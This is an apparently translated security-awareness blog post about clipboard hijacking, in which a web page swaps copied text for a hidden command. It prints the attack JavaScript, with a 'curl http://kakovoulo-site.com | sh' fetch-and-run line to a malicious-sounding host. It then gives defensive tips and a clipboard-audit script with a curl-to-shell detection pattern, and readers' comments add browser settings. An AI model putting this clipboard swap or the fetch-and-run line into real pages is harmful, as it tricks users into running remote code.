How you can be compromised with a simple copy-paste

An unusual hacking demonstration will make you think twice before copying or pasting any text.


This is why you should NEVER copy and paste commands directly into your terminal. Ask any developer or administrator whether they have ever copied a command line or code snippet from the web, and the answer will probably be YES. You assume that what you copied is what you paste, right? Well, no!

You think you're copying one thing, but it is replaced with something else, such as malicious code. A single line of code inserted into what you copied is enough to create a backdoor into your system.

This attack is very simple but can cause great damage. Let's see how it works in practice:

Thanks to Harel Friedlander for writing this one.

Suppose you are looking for how to update Ubuntu and find the following command. Try it: copy and paste the following command:

$ sudo apt update

 

Here is the JavaScript that runs the exploit:

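// Runs when the reader copies the element with id "copyme" (the visible command).
document.getElementById('copyme').addEventListener('copy', function(e) {
    // Put different text on the clipboard; the trailing "\n" is a new line.
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    // Cancel the default copy so the replaced text is what stays on the clipboard.
    e.preventDefault();
});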

How can I protect myself?

The safest approach is to paste nothing from the web into your terminal. Another option is to type "#" before pasting: this turns the command into a comment, so it is not executed and you can see what you pasted before your terminal runs anything. You can of course also paste the command into a text file before putting it in your terminal.
Also, many terminals can be configured not to run a command automatically when you paste a "\n" (new line).
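
One way to carry out the check described above before pasting, as an added example that is not part of the original article. The function names are hypothetical, the clipboard string is the one set by the script shown earlier, and the checks go a little beyond the article's single-line case by also flagging multi-line text and control characters.

```javascript
// Added example (not from the original article): audit clipboard text
// before it reaches a shell. All names here are hypothetical.

// Visible text on the page, and the text the article's copy handler
// actually places on the clipboard.
const VISIBLE = 'sudo apt update';
const CLIPBOARD =
  'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n';

// Return a list of reasons not to paste `pasted` straight into a terminal.
function auditPaste(visible, pasted) {
  const findings = [];
  if (pasted !== visible) findings.push('differs-from-visible-text');
  // A newline can make the terminal run the line the moment it is pasted.
  if (/[\r\n]/.test(pasted)) findings.push('contains-newline');
  // A newline before the end means more than one command line; a leading
  // "#" would only comment out the first of them.
  if (/[\r\n]/.test(pasted.replace(/\r?\n$/, ''))) findings.push('multiple-lines');
  // Control characters other than tab/CR/LF (for example ESC sequences).
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(pasted)) findings.push('control-characters');
  // Remote content piped into a shell interpreter.
  if (/\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/.test(pasted)) {
    findings.push('download-piped-to-shell');
  }
  return findings;
}

// Spell out every control character, including the final newline, so
// nothing in the clipboard text stays invisible.
function renderVisible(text) {
  const names = { '\n': '\\n', '\r': '\\r', '\t': '\\t' };
  return text.replace(/[\x00-\x1f\x7f]/g, (c) =>
    names[c] || '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

console.log(renderVisible(CLIPBOARD));
console.log(auditPaste(VISIBLE, CLIPBOARD));
```

An empty list from auditPaste means the clipboard text matches what was visible and none of the checks fired; it does not mean the command itself is safe to run.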

The above was just one example of why awareness is necessary to avoid any s. There are many examples of truly malicious scripts circulating on the internet.


Written by giorgos


4 Comments

  1. The other alternative, of course, is to use an intermediate destination (e.g. a text editor), where it will show what you really have in your clipboard.

  2. Good evening, Happy Birthday and Happy New Year!!

    I would like to thank you first for your informative articles.

    Another solution that solves the above problem works in Firefox: about:config >> dom.event.clipboardevents.enabled >> false.

    A friend of the most customizable browser in the world.
